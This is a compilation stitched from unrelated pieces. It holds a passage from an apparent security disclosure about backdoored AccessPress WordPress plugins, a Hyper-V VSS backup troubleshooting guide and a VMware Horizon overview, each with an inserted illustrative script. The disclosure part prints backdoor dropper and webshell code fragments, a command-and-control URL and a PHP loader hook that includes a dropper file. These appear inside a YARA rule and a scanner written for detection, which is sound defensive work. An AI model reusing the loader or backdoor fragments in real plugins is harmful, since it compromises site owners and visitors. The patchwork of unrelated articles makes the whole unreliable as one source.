ak-menu-icons-lite                   1.0.9    -
ap-companion                         1.0.7    -        2
ap-contact-form                      1.0.6    1.0.7
ap-custom-testimonial                1.4.6    1.4.7
ap-mega-menu                         3.0.5    3.0.6
ap-pricing-tables-lite               1.1.2    1.1.3
apex-notification-bar-lite           2.0.4    2.0.5
cf7-store-to-db-lite                 1.0.9    1.1.0
comments-disable-accesspress         1.0.7    1.0.8
easy-side-tab-cta                    1.0.7    1.0.8
everest-admin-theme-lite             1.0.7    1.0.8
everest-coming-soon-lite             1.1.0    1.1.1
everest-comment-rating-lite          2.0.4    2.0.5
everest-counter-lite                 2.0.7    2.0.8
everest-faq-manager-lite             1.0.8    1.0.9
everest-gallery-lite                 1.0.8    1.0.9
everest-google-places-reviews-lite   1.0.9    2.0.0
everest-review-lite                  1.0.7    -
everest-tab-lite                     2.0.3    2.0.4
everest-timeline-lite                1.1.1    1.1.2
inline-call-to-action-builder-lite   1.1.0    1.1.1
product-slider-for-woocommerce-lite  1.1.5    1.1.6
smart-logo-showcase-lite             1.1.7    1.1.8
smart-scroll-posts                   2.0.8    2.0.9
smart-scroll-to-top-lite             1.0.3    1.0.4
total-gdpr-compliance-lite           1.0.4    -
total-team-lite                      1.1.1    1.1.2
ultimate-author-box-lite             1.1.2    1.1.3
ultimate-form-builder-lite           1.5.0    1.5.1
woo-badge-designer-lite              1.1.0    1.1.1
wp-1-slider                          1.2.9    1.3.0
wp-blog-manager-lite                 1.1.0    1.1.2
wp-comment-designer-lite             2.0.3    2.0.4
wp-cookie-user-info                  1.0.7    1.0.8
wp-facebook-review-showcase-lite     1.0.9    -
wp-fb-messenger-button-lite          2.0.7    -
wp-floating-menu                     1.4.4    1.4.5
wp-media-manager-lite                1.1.2    1.1.3
wp-popup-banners                     1.2.3    1.2.4
wp-popup-lite                        1.0.8    -
wp-product-gallery-lite              1.1.1    -

Table 2: Plugins and versions compromised by the attack, as well as known clean versions.

Notes:

  1. This plugin has not been updated, but is believed to be clean as the version on the AccessPress Themes website was an older version.
  2. This plugin has not been updated, but is believed to be clean as it was not originally available on the AccessPress Themes website.

IOCs

The following YARA rule can be used to check if the site has been infected. It will detect both the dropper part of the infection as well as the installed webshell.

    rule accesspress_backdoor_infection
    {
    strings:
        // IoC's for the dropper
        $inject0 = "$fc = str_replace('function wp_is_mobile()',"
        $inject1 = "$b64($b) . 'function wp_is_mobile()',"
        $inject2 = "$fc);"
        $inject3 = "@file_put_contents($f, $fc);"

        // IoC's for the dumped payload
        $payload0 = "function wp_is_mobile_fix()"
        $payload1 = "$is_wp_mobile = ($_SERVER['HTTP_USER_AGENT'] == 'wp_is_mobile');"
        $payload2 = "$g = $_COOKIE;"
        $payload3 = "(count($g) == 8 && $is_wp_mobile) ?"

        $url0 = /https?:\/\/(www\.)?wp\-theme\-connect\.com(\/images\/wp\-theme\.jpg)?/

    condition:
        all of ( $inject* )
        or all of ( $payload* )
        or $url0
    }
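The scanner below is an added example written for this article, not Jetpack’s code: it re-implements the YARA rule’s string logic in plain Python (no YARA engine needed), additionally looks for the apap_plugin_check loader hook shown earlier and for an inital.php file in a plugin directory, and runs against a constructed sample install. The sample paths and file contents are constructed for the demo and are not taken from a real site.

```python
"""Scan a WordPress tree for the AccessPress dropper/backdoor indicators (illustrative code)."""
import re
import tempfile
from pathlib import Path

# Indicator strings copied from the YARA rule in the article.
INJECT_STRINGS = (
    "$fc = str_replace('function wp_is_mobile()',",
    "$b64($b) . 'function wp_is_mobile()',",
    "$fc);",
    "@file_put_contents($f, $fc);",
)
PAYLOAD_STRINGS = (
    "function wp_is_mobile_fix()",
    "$is_wp_mobile = ($_SERVER['HTTP_USER_AGENT'] == 'wp_is_mobile');",
    "$g = $_COOKIE;",
    "(count($g) == 8 && $is_wp_mobile) ?",
)
URL_RE = re.compile(rb"https?://(www\.)?wp-theme-connect\.com(/images/wp-theme\.jpg)?")
DROPPER_FILENAME = "inital.php"    # sic: the dropper's misspelled filename, as on the page
LOADER_HOOK = "apap_plugin_check"  # function added to the modified main plugin file

# The loader hook quoted in the article; it only includes inital.php if that file exists.
LOADER_HOOK_PHP = """<?php
if(is_admin()) {
    add_action( "init", 'apap_plugin_check' );
}

function apap_plugin_check(){
    if(file_exists(__DIR__ . "/inital.php")){
        include(__DIR__ . "/inital.php");
    }
}
"""


def classify_content(data: bytes) -> list[str]:
    """Return the indicator groups a file body matches (mirrors the YARA 'condition')."""
    hits = []
    if all(s.encode() in data for s in INJECT_STRINGS):
        hits.append("dropper")
    if all(s.encode() in data for s in PAYLOAD_STRINGS):
        hits.append("payload")
    if URL_RE.search(data):
        hits.append("c2-url")
    if LOADER_HOOK.encode() in data:
        hits.append("loader-hook")
    return hits


def scan_tree(root) -> dict[str, list[str]]:
    """Walk every .php file under root; return {relative path: [indicator groups]} for hits."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = classify_content(path.read_bytes())
        if path.name == DROPPER_FILENAME:
            hits.append("dropper-file-present")
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def build_sample_tree(root) -> None:
    """Write a constructed sample install: indicator strings and the loader hook, no payload."""
    root = Path(root)
    files = {
        "wp-content/plugins/clean-plugin/clean-plugin.php":
            "<?php\nfunction clean_plugin_init() { return true; }\n",
        "wp-content/plugins/ap-example/ap-example.php": LOADER_HOOK_PHP,
        # Dropper fixture: only the four indicator lines from the rule, not runnable PHP.
        "wp-content/plugins/ap-example/inital.php":
            "<?php\n" + "\n".join(INJECT_STRINGS) + "\n",
        # One dropper string plus the URL: must match on the URL branch alone.
        "wp-content/plugins/other/partial.php":
            "<?php\n" + INJECT_STRINGS[0] + "\n// http://wp-theme-connect.com/images/wp-theme.jpg\n",
        # Placeholder name for a modified core file carrying the dumped payload strings.
        "wp-includes/example-core-file.php":
            "<?php\n" + "\n".join(PAYLOAD_STRINGS) + "\n",
    }
    for rel, body in files.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(body)


def demo() -> dict[str, list[str]]:
    """Build the sample tree in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_tree at a real document root (wp-content and wp-includes included) to apply the same checks outside the demo.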

Recommendations

If you have any themes or plugins installed directly from AccessPress Themes or any other place except WordPress.org, you should upgrade immediately to a safe version as indicated in the tables above. If no safe version is available, replace it with the latest version from WordPress.org.

Please note that this does not remove the backdoor from your system, so in addition you need to reinstall a clean version of WordPress to revert the core file modifications done during installation of the back door.

If you have a paid theme or plugin from AccessPress Themes/Access Keys, we advise contacting their support for help.

We strongly recommend that you have a security plan for your site that includes malicious file scanning and backups. Jetpack Security is one great WordPress security option to ensure your site and visitors are safe. Jetpack Scan has detected all variants of this back door and the dropper since September 30.

Timeline

2021-09-22: Jetpack Scan team discovers the dropper and back door in the FotoGraphy theme, and tries to contact the vendor about the initial finding.

2021-09-27: Confirm presence of dropper + back door in all current free plugins and themes downloaded from the vendor’s website.

2021-09-28: Confirm that dropper + back door is not present in downloads from wordpress.org.

2021-09-29: Try to contact the vendor again, with updates on new findings.

2021-10-14: Escalated to the WordPress plugins team to try to obtain contact with the vendor.

2021-10-15: Compromised extensions are removed from the vendor’s site.

2021-10-16: Response from vendor.

2022-01-17: Most plugins have been upgraded to new versions; themes have been pulled from WordPress.org.

2022-01-18: Public disclosure.

Source:
https://jetpack.com/2022/01/18/backdoor-found-in-themes-and-plugins-from-accesspress-themes/

Altaro: The backup snapshot for this VM is not application consistent. The backup will proceed in crash-consistent mode. (Error code ‘RCTCONTROLLER_011’)

APPLIES TO

Windows Server 2016 Hosts or newer

PROBLEM

The backup completes but gives the warning “The backup snapshot for this VM is not application consistent. The backup will proceed in crash-consistent mode. (Error code ‘RCTCONTROLLER_011’)”.

SOLUTION

The Microsoft Volume Shadow Copy Service (VSS) is a Microsoft technology that forms part of Windows Server 2008 R2. This component allows applications to access a “point in time” snapshot of a logical drive on the host machine, including any VHDX and related virtual machine files on that drive. This enables these files to be accessed even if they are in use or locked. It also ensures that the VHDX and related files are in a consistent state and all data has been flushed to disk before they are accessed for backup purposes.

Microsoft has since made improvements to this technology, and in Server 2016 and newer it works differently again: “Production Checkpoints” are now used as the gateway between backup applications and the operating system. VSS exists to address the fact that data can and does change while backups are being taken.

In fact, if you are getting this warning through Altaro VM Backup, you will also get it when running a Production Checkpoint. To run a production checkpoint as opposed to a standard one, follow the steps below:

  • Go to Hyper-V Manager
  • Right-click on the VM > Settings
  • Go to Checkpoints
  • Un-tick the option “Create standard checkpoints if it’s not possible to create a production checkpoint”
  • Apply and OK
  • Right-click on the VM “Checkpoint”

The checkpoint operation should now fail, because it was not able to run VSS inside the VM and tell applications to cease all I/O and flush outstanding data and operations from memory to disk so that the backup does not miss anything. VSS is broad in scope and can be affected by any application running inside the VM.

That said, resolving a ‘crash-consistent’ backup is not always easy or straightforward; proceed to troubleshoot as follows:

  1. Firstly, check whether your VM actually requires an application-consistent backup. If it does not, you can disable it from the “VSS Settings” screen: simply uncheck “Application Consistent” and save the changes. More information here.
  2. If your VM is running a non-VSS-aware guest, such as a Linux OS, you can simply go to “VSS Settings” and disable “Application Consistent” for these VMs.
  3. The guest must be running one of the guest operating systems supported on Server 2016, as listed at: https://technet.microsoft.com/en-gb/windows-server-docs/compute/hyper-v/supported-windows-guest-operating-systems-for-hyper-v-on-windows
  4. Ensure you have the latest Windows Updates installed, as “Integration Services” are now deployed through Windows Update.
  5. If the VM giving trouble is running Microsoft SBS 2011, then please go through this article.
  6. In the Properties dialog of the VM, from either Hyper-V Manager or SCVMM, look on the Integration Services tab and ensure that “Backup (volume checkpoint)” is checked.
  7. The guest VM must be in a running state.
  8. All of the guest VM’s disks must have ample free space available for the internal shadow copy to complete. You must have 10% free disk space on each disk.
  9. In the guest VM, the service named “Hyper-V Volume Shadow Copy Requestor” must be running.
  10. The Checkpoint File Location for the VM must be set to the same volume in the host operating system as the VHDX files for the VM.
  11. The guest VM must have a SCSI controller attached in the VM settings (in Hyper-V Manager). There is no need to have any disks on the controller, but it must be present.
  12. The guest VM must not have the Shadow Storage assignment of any volume explicitly set to a volume other than itself. This can be checked by running “vssadmin list shadowstorage” from the command line.
  13. If the guest OS has a system reserved partition, verify that it has at least 45 MB of free space. If less than that is free, ensure that a Windows shadow copy can still be created, as per the screenshot below:



  14. All of the virtual machine’s volumes must be formatted with NTFS/ReFS. The volume that contains the .VHD(s) for the VM must also be formatted with NTFS/ReFS. The guest operating system’s disks must be “Basic”, not “Dynamic” (this is not the same as dynamic vs. fixed VHDs, see screenshot below):



  15. Run the command below in command prompt inside the VM that is crash-consistent:

    vssadmin list writers

    In the results check that all writers inside the VM are in a “Stable” state and showing “No error”.

  16. Check that the shadow storage on each drive is not full; ideally it should be set to unbounded. You can set it to unbounded by running the following commands in a command prompt:

    vssadmin add shadowstorage /For=C: /On=C: /MaxSize=UNBOUNDED
    vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=UNBOUNDED

    Note: Run the two above commands for each drive, each time replacing the drive letter from C: to the drive in question.

  17. The “COM+ Event System”, “Distributed Transaction Coordinator”, “Remote Procedure Call (RPC)”, and “System Event Notification” services must be running within the VM. By default, these are set to “Automatic” and/or “Automatic (Delayed Start)”. The “COM+ System Application” and “Microsoft Software Shadow Copy Provider” and “Volume Shadow Copy” services must at least be set to Manual, which is the default for these. It is acceptable, but not required, to set them to “Automatic” or “Automatic (Delayed Start)”.
  18. Check whether you are getting a “vmicvss” event with ID 13 in the Application event log of the VM, stating that Windows cannot perform an online backup of this system. The event reads:

    Event ID: 13
    Source: vmicvss
    Description: Windows cannot perform an online backup of this system because scoped snapshots are enabled. To resolve this, disable scoped snapshots by creating the following registry value on this computer:
         PATH: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
         DWORD: ScopeSnapshots
         Value: 0
  19. If the issue persists check for warnings or errors in the Application and System event logs on the VM that is giving trouble.
  20. Ensure that the latest Windows Updates for the Host and VM are also applied. Please note that “Optional Updates” are usually also important for VSS operations and are suggested as well.
  21. If none of the above helps, please contact our support team.
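As an added example (not Altaro’s code), the following script parses constructed samples of “vssadmin list writers” and “vssadmin list shadowstorage” output and flags exactly what steps 12, 15 and 16 above tell you to look for: writers that are not “Stable” with “No error”, shadow storage placed on a different volume than its own, and storage that is not UNBOUNDED, for which it emits the step 16 commands. The sample outputs, writer names and volume GUIDs are constructed placeholders, and the two-volume layout is assumed.

```python
"""Check vssadmin output against the crash-consistent backup checklist (illustrative code)."""
import re

# Constructed sample of `vssadmin list writers` output; GUIDs are placeholders.
SAMPLE_WRITERS = r"""
Writer name: 'Task Scheduler Writer'
   Writer Id: {00000000-0000-0000-0000-000000000001}
   State: [1] Stable
   Last error: No error

Writer name: 'SqlServerWriter'
   Writer Id: {00000000-0000-0000-0000-000000000002}
   State: [8] Failed
   Last error: Non-retryable error

Writer name: 'System Writer'
   Writer Id: {00000000-0000-0000-0000-000000000003}
   State: [5] Waiting for completion
   Last error: No error
"""

# Constructed sample of `vssadmin list shadowstorage` output: C: is fine, D: has both problems.
SAMPLE_SHADOWSTORAGE = r"""
Shadow Copy Storage association
   For volume: (C:)\\?\Volume{placeholder-guid-c}\
   Shadow Copy Storage volume: (C:)\\?\Volume{placeholder-guid-c}\
   Used Shadow Copy Storage space: 2.13 GB (1%)
   Allocated Shadow Copy Storage space: 2.58 GB (1%)
   Maximum Shadow Copy Storage space: UNBOUNDED (100%)

Shadow Copy Storage association
   For volume: (D:)\\?\Volume{placeholder-guid-d}\
   Shadow Copy Storage volume: (E:)\\?\Volume{placeholder-guid-e}\
   Used Shadow Copy Storage space: 0 bytes (0%)
   Allocated Shadow Copy Storage space: 0 bytes (0%)
   Maximum Shadow Copy Storage space: 9.78 GB (10%)
"""


def parse_writers(text: str) -> list[dict]:
    """Split `vssadmin list writers` output into {name, state, last_error} records."""
    writers = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Writer name: "):
            writers.append({"name": line.split("'")[1], "state": "", "last_error": ""})
        elif writers and line.startswith("State: "):
            writers[-1]["state"] = re.sub(r"^State: \[\d+\] ", "", line)  # drop the "[n]" code
        elif writers and line.startswith("Last error: "):
            writers[-1]["last_error"] = line[len("Last error: "):]
    return writers


def unhealthy_writers(text: str) -> list[str]:
    """Writers violating step 15: every writer must be 'Stable' and report 'No error'."""
    return [w["name"] for w in parse_writers(text)
            if w["state"] != "Stable" or w["last_error"] != "No error"]


def parse_shadowstorage(text: str) -> list[dict]:
    """Split `vssadmin list shadowstorage` output into {for, on, max} records."""
    assocs = []
    for line in text.splitlines():
        line = line.strip()
        if line == "Shadow Copy Storage association":
            assocs.append({"for": "", "on": "", "max": ""})
        elif assocs and line.startswith("For volume: "):
            assocs[-1]["for"] = re.search(r"\((\w:)\)", line).group(1)
        elif assocs and line.startswith("Shadow Copy Storage volume: "):
            assocs[-1]["on"] = re.search(r"\((\w:)\)", line).group(1)
        elif assocs and line.startswith("Maximum Shadow Copy Storage space: "):
            assocs[-1]["max"] = line.split(": ", 1)[1]
    return assocs


def shadowstorage_issues(text: str) -> dict[str, list[str]]:
    """Per volume: 'on-other-volume' (step 12) and/or 'bounded' (step 16)."""
    issues = {}
    for a in parse_shadowstorage(text):
        problems = []
        if a["on"] != a["for"]:
            problems.append("on-other-volume")
        if not a["max"].startswith("UNBOUNDED"):
            problems.append("bounded")
        if problems:
            issues[a["for"]] = problems
    return issues


def remediation_commands(text: str) -> list[str]:
    """The step 16 commands, generated for each volume whose shadow storage is bounded."""
    cmds = []
    for vol, problems in shadowstorage_issues(text).items():
        if "bounded" in problems:
            cmds.append(f"vssadmin add shadowstorage /For={vol} /On={vol} /MaxSize=UNBOUNDED")
            cmds.append(f"vssadmin resize shadowstorage /For={vol} /On={vol} /MaxSize=UNBOUNDED")
    return cmds


if __name__ == "__main__":
    print("Unhealthy writers:", unhealthy_writers(SAMPLE_WRITERS))
    print("Shadow storage issues:", shadowstorage_issues(SAMPLE_SHADOWSTORAGE))
    print("\n".join(remediation_commands(SAMPLE_SHADOWSTORAGE)))
```

Inside a real guest, feed the functions the captured output of the two vssadmin commands instead of the constructed samples.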

Source:
https://help.altaro.com/support/solutions/articles/43000469403

What Is VMware Horizon and How Does It Work?

Businesses today have been forced to switch to remote working to ensure business continuity. After the pandemic began in early 2020, it caused a shift to a majority remote workforce, seemingly overnight. With the change to a distributed workforce, new requirements have emerged for businesses around availability, security, and flexibility.

Virtual Desktop Infrastructure (VDI) is a solution that allows connecting remote workers with virtual desktops and applications running in a corporate data center. VMware Horizon is a VDI solution offered by VMware that provides a robust feature set and capabilities for remote workers. So what is VMware Horizon, and how does it work?

What is VMware Horizon?

Today, the work from anywhere model is no longer optional for businesses. Providing accessibility, flexibility, and connectivity from anywhere for the distributed workforce allows remote employees to remain productive no matter where they are located.

As the pandemic escalated, businesses quickly found legacy on-premises desktop and app virtualization platforms that predated the widespread use of the cloud were not equipped for current challenges. It led to many companies struggling to provide the distributed workforce with fast and reliable access to apps they need for business productivity.

VMware Horizon is an end-to-end solution for managing and delivering virtualized or physical desktops and virtual application delivery to end-users. It allows creating and brokering connections to Windows & Linux virtual desktops, Remote Desktop Services (RDS) applications, and desktops. It can also deliver Linux-hosted applications.

VMware Horizon is a Virtual Desktop Infrastructure (VDI) solution, a core component of VMware’s digital workspace for businesses looking to deliver virtual desktops and applications to their workforce. It provides the tooling and capabilities that enable access from any device and is deeply integrated with other VMware solutions and services such as VMware NSX, VMware Workspace One, vSAN, and others.

VMware Horizon provides secure and robust connectivity for remote workers

Recent VMware Horizon versions have evolved to provide desktop resources on-premises, in the cloud, hybrid clouds, and multi-cloud environments.

VMware Horizon Editions

VMware Horizon is provided in three editions:

  • Horizon Standard
  • Horizon Advanced
  • Horizon Enterprise

All three editions provide the components needed for end-to-end virtual desktop deployment.

What are the key capabilities / features of VMware Horizon?

  • VMware Horizon is a flexible and agile hybrid cloud platform.
  • It enables businesses to utilize existing datacenter based resources, including transforming on-premises desktop and app environments without redeploying.
  • It provides the ability to leverage the cloud for additional capacity and use cases.
  • Choose if and when you transition workloads to optimize performance and lower the cost of on-premises environments.
  • It lets you leverage cloud-native control plane services. As a result, it reduces costs, improves productivity, and shifts IT focus from manual tasks to automated processes.
  • Manage and monitor your deployment from one central management GUI.
  • It offers the ability to meet remote user needs keeping employees connected to desktops and apps from anywhere and any device with a single login. It doesn’t matter where the data resides, on-premises or in the cloud.
  • The Horizon control plane delivers the ability to deploy, manage, and scale virtual desktops and apps across hybrid cloud environments.
  • Horizon is a modern platform for securely delivering virtual desktops and apps across the hybrid cloud, keeping employees connected, productive and engaged, anytime and anywhere.

Deliver applications and desktops automatically and in real-time

One of the key benefits and use cases of VMware Horizon is to deliver applications and desktops automatically and in real-time. Today, many organizations are using VMware Horizon as the vehicle that allows remote workers to connect to virtual machine resources or physical workstations in the corporate network, without VPN, or exposing an RDP server to the outside world.

Administrators configure desktop pools consisting of a single desktop or multiple desktops that end-users can connect to and utilize. When there are multiple virtual machines or physical desktops in a single pool, users will be placed on an available desktop resource in the pool.

Desktop pools consist of:

  • Automated desktop pools – An automated desktop pool uses a vCenter Server template or virtual machine snapshot to generate new machines. The machines can be created when the pool is created or generated on demand based on pool usage.
  • Manual desktop pools – A manual desktop pool provides access to an existing set of machines. Any machine that can install the VMware Horizon agent is supported. These include both vCenter virtual machines and physical desktops.
  • RDS Desktop pools – A Microsoft RDS desktop pool provides RDS sessions as machines to Horizon users. The Horizon Connection Server manages the RDS sessions in the same way as normal machines. Microsoft RDS hosts are supported on vCenter virtual machines and physical computers.

Viewing VMware Horizon Desktop Pools

Application Pools provide remote workers with access to published applications, either from a desktop pool or RDS farm.

Viewing a published application in VMware Horizon

It also allows quickly performing maintenance tasks such as enabling or disabling specific Horizon Connection Servers and performing backup operations. You can also add vCenter Server environments and integrate your Unified Access Gateways to the environment.

Performing maintenance operations in the VMware Horizon Administration Console

Simplify management and maintenance tasks

One of the key areas that VMware Horizon provides quick time to value is the area of management and maintenance. The VMware Horizon Administration Console is an HTML 5 web console that is quick and intuitive. All of the tasks are very wizard-driven with natural workflows.

In the VMware Horizon Administration Console, administrators can easily see:

  • Problem vCenter VMs
  • Problem RDS hosts
  • Events
  • System Health

The VMware Horizon Monitoring dashboard quickly shows the overall system health, sessions, workload, VDI desktops, RDSH desktops, RDSH applications, and other information.

Viewing the VMware Horizon monitoring dashboard

Keep sensitive data safe and enforce endpoint compliance

Several tools and VMware Horizon configurations help keep business-critical and sensitive data safe and enforce endpoint compliance. For example, the Endpoint Compliance Checks feature is part of the Unified Access Gateway (UAG) that provides a layer of security for clients accessing Horizon resources. The Endpoint Compliance Checks helps to verify end-user client compliance to predefined policies. These may include antivirus policy or encryption policy on endpoints.

Currently, a couple of endpoint compliance check providers offer the ability to check compliance of endpoints. These include:

  • OPSWAT – The OPSWAT MetaAccess persistent agent or the OPSWAT MetaAccess on-demand agent on the Horizon Client communicates the compliance status to an OPSWAT instance. It can then enforce policies related to the health of the endpoint and the allowed access to Horizon resources

OPSWAT Endpoint Compliance Checks

  • Workspace ONE Intelligence (Risk Analytics) – The Workspace ONE Intelligence platform has a risk analytics feature. It can assess both user and device risk by identifying behaviours that affect security and calculating a risk score for each device and user. Based on the risk score, policies can define whether or not clients can connect and access resources.

End-user components

Only a couple of components are needed on the end-user side for VMware Horizon: you can connect to the Horizon environment with either a browser or the VMware Horizon Client. Most modern clients have an HTML5-capable browser that can connect to VMware Horizon.

While you can connect to VMware Horizon-enabled endpoints using a web browser, the most robust connection experience is provided with the VMware Horizon Client. However, a question often comes up with the VMware Horizon Client – is it free?

The VMware Horizon Client is indeed a free download from the VMware Customer Connect portal. Also, there is no need to provide an email address and sign up for an account. You can find the most recent download of the VMware Horizon Clients here:

Downloading the VMware Horizon Client

The availability and ease of downloading the VMware Horizon Client help to ensure remote workers can easily download, install, and connect to VMware Horizon resources. Another great feature built into the VMware Horizon Client is checking for and updating the client directly from the interface.

Checking for updates to VMware Horizon Client

When remote workers browse to the public URL of the Unified Access Gateway, the UAG presents the Horizon Connection Server web page, allowing users to download the client or connect to their assigned resources using the VMware Horizon HTML access link.

Browsing to the VMware Horizon web access

VMware Workspace ONE UEM additional components

Organizations using cloud-based VMware Workspace ONE can simplify access to the cloud, mobile, and enterprise applications from various types of devices. Workspace ONE Unified Endpoint Management (UEM) is a single solution for modern, over-the-air management of desktops, mobile, rugged, wearables, and IoT.

Supported devices with Workspace ONE UEM

It manages and secures devices and apps, taking advantage of native MDM capabilities in iOS and Android and the mobile-cloud management efficiencies found in modern versions of Windows, Mac, and Chrome OS.

Managing clients with Workspace ONE UEM requires the Workspace ONE UEM agent to be installed on the devices. It can be installed manually, through scripted installations, or by using GPOs. Organizations can also make use of the Workspace ONE Intelligent Hub for an easily integrated digital workspace solution designed to improve employee engagement and productivity through a single app.

The New Naming Format for VMware Horizon 8

VMware has departed somewhat from the naming convention used for legacy versions of VMware Horizon. While older versions were named with a “major.minor” release number, VMware has adopted a “YYMM” naming convention denoting the year and month of the release, much as other software vendors have done in the last couple of years.

VMware Horizon 8 is denoted with a new naming convention in the YYMM format

If you see any of the VMware Horizon versions that start with at least a “20,” these are synonymous with VMware Horizon 8 across various documentation.

Is VMware Horizon a VPN?

There are many ways that enterprise organizations have traditionally delivered access to internal resources for remote employees. Virtual Private Network (VPN) has historically been a prevalent and familiar way for end-users to access business-critical resources that reside on the internal corporate network from the Internet.

While VPN is more secure than simply placing internal resources accessible directly from the Internet (not recommended), it also has its share of security issues. With VPN connections, a VPN client is loaded on the client workstation, laptop, or other devices, creating a secure, encrypted tunnel between the client and a VPN terminator, such as a firewall or other VPN device.

VPNs traditionally have been used for remote connectivity

While this secures and encrypts the communication between the client and the internal network, it essentially makes the end-user device part of the network. You can think of a VPN connection as simply a “long patch cable” between the corporate network switch and the client. There are ways to secure VPN connections and scope down the resources the external clients can see. However, it opens the door to potentially connecting a client with malware to the corporate network. It also creates the possibility of easy data exfiltration from the corporate network to the client.

VPN connections are also notoriously complex and cumbersome to manage and maintain. Admins must manage each VPN client individually in most cases. In addition, each VPN connection is its own tunnel to the corporate network, creating the need for tedious management of multiple tunnels.

VMware Horizon provides a solution that is not VPN-based and solves the challenges mentioned above with traditional VPN connections. Note the following:

  • Remote users connect to virtual or physical desktops that are provisioned inside the corporate network. It means the end-user remote client is not directly connected to the corporate network
  • While the Horizon Client is recommended for the most robust experience connecting to the VMware Horizon environment, end-users can also connect to provisioned resources over a simple web browser connection, with no client required.
  • VPNs may not work with all types of devices. VMware Horizon connectivity, either via the Horizon Client or web browser connection, means almost any modern device with web connectivity can allow a user to connect to VMware Horizon resources
  • Admins have a consolidated and centrally managed set of infrastructure as a connectivity point, either with the Unified Access Gateways (recommended for secure external connectivity) or the Horizon Connection Servers
  • Combined with VMware NSX-T Data Center, administrators can easily secure the connectivity between VMware Horizon resources and which resources users can hit, making it an identity-driven solution

VMware Anywhere Workspace

VMware Horizon is a core component of the VMware Anywhere Workspace. What is the VMware Anywhere Workspace? It is a holistic solution that combines multiple components required for effective and efficient secure remote access, including:

  • Digital workspace solution – Provided by VMware Horizon cloud services or on-premises resources
  • Endpoint security – Organizations can seamlessly secure their remote worker interface with VMware NSX-T Data Center and VMware Carbon Black.
  • Secure Access Service Edge (SASE) – Secure access service edge platform that converges industry-leading cloud networking and cloud security to deliver flexibility, agility, security, and scale for enterprise environments of all sizes.

Note how VMware Horizon fits into the various aspects of VMware Anywhere Workspace:

  • It helps to manage multi-modal employee experience – With the VMware Anywhere Workspace, VMware Horizon can help deliver a familiar desktop and application experience across workspace locations and devices.
  • Security and the distributed edge – VMware Horizon delivers access to desktops and applications to any endpoint.
  • Anywhere Workspace Integrations – Workspace Security brings Carbon Black together with Workspace ONE UEM and VMware Horizon.

VMware Horizon Architecture and Logical Components

VMware Horizon has a robust architecture composed of many different components that make up the end-to-end solution. The components of the VMware Horizon architecture include:

  • Horizon Client – The client is the piece that forms the protocol session connection to a Horizon Agent running in a virtual desktop, RDSH server, or physical machine
  • Unified Access Gateway (UAG) – It provides secure edge services for the Horizon Client. The Horizon Client authenticates to a Connection Server through the Unified Access Gateway and then forms a protocol session connection to the UAG and then the Horizon Agent running in a virtual desktop or RDSH server.
  • Horizon Connection Server – The Connection Server brokers and connects users to the Horizon Agent installed on VMs, physical hosts, and RDSH servers. The Connection Server authenticates user sessions through Active Directory, and grants access to the proper entitled resource.
  • Horizon Agent – The agent is installed in the guest OS of the target VM or system. It allows the machine to be managed by the Connection Servers and allows a Horizon Client to connect using the protocol session to the Horizon Agent.
  • RDSH Server – Microsoft Remote Desktop Servers that provide access to published applications and session-based remote desktops to end-users.
  • Virtual Machine – Virtual machines can be configured as persistent or non-persistent desktops. Persistent desktops are usually assigned in a 1-to-1 fashion to a specific user. Non-persistent desktops are assigned in desktop pools that can be dynamically provisioned to users as needed.
  • Physical Desktop – Counterintuitively, VMware Horizon can be used as a secure and efficient way to deliver connectivity to physical desktops to end-users. Starting with VMware Horizon 7.7, VMware introduced the ability to broker physical desktop machines with RDP. In Horizon 7.12, support was added for Blast protocol connectivity to physical desktops.
  • Virtual Application – Horizon can be used with RDSH servers to provide virtual application delivery. Using the functionality of the published application in RDSH, VMware Horizon can deliver the published applications to assigned users.

Logical Components

There are other components of Horizon architecture that are considered to be logical components of the solution. Some of the components listed below are not absolutely required. However, they can be used to enhance a Horizon deployment and scale the capabilities, security, and performance of the solution.

  • Workspace ONE Access – VMware Workspace ONE provides the solution for enterprise single sign-on (SSO) for the enterprise. It simplifies the access to apps, desktops, and other resources to the end-user. It can integrate with existing identity providers and provide a seamless login experience to create a smooth access workflow. It also offers application provisioning, a self-service catalogue, and conditional access.
  • App Volumes Manager – VMware App Volumes Manager coordinates and orchestrates the delivery of applications by managing assignments of application volumes. These include packages and writable volumes that can easily assign applications to users, groups, and target computers.
  • Dynamic Environment Manager – User profiles are challenging in dynamic environments where a single user accesses many different resources. Dynamic Environment Manager provides profile management by capturing user settings for both the operating system and end-user applications.
  • VMware vSAN storage – VMware vSAN is a software-defined storage solution that offers many advantages in the enterprise. It can deliver high-performance, highly-scalable storage that can be seamlessly managed from the vSphere Client as part of the native VMware solution. It does this by aggregating locally attached storage in each ESXi host in the vSphere cluster and presenting it as a logical volume for virtual machines and modern workloads. When it comes to VMware Horizon environments that are mission-critical, you want to have highly-resilient storage that is scalable and performant. VMware Horizon environments backed by VMware vSAN work exceptionally well for this use case.
  • VMware NSX-T Data Center – Another consideration for VMware Horizon environments and end-user computing is security. VMware NSX-T Data Center provides the network-based security needed in EUC environments. It allows easily creating secure, resilient, and software-defined networks that allow admins to take advantage of micro-segmentation for VMware Horizon workloads. Each virtual desktop can be isolated from all other virtual desktops using VMware NSX-T Data Center, bolstering security and protecting other critical Horizon infrastructure, such as the Connection Servers.
  • Microsoft SQL Servers – It is recommended to have a dedicated Microsoft SQL Server to house the event databases required by VMware Horizon. Plan your VMware Horizon deployment accordingly.

Horizon Hybrid and Multicloud Architecture

VMware Horizon can be deployed in many different architecture designs. These include on-premises, in the cloud, or a combination of hybrid and multi-cloud architectures.

In a VMware Horizon hybrid deployment, the desktop infrastructure can run in an on-premises datacenter while the Horizon control plane runs in the cloud, or pods can be deployed both on-premises and in a public cloud and joined together. Organizations can also connect an existing Horizon 7 or Horizon 8 implementation to the Horizon Cloud Service using the Horizon Cloud Connector appliance.

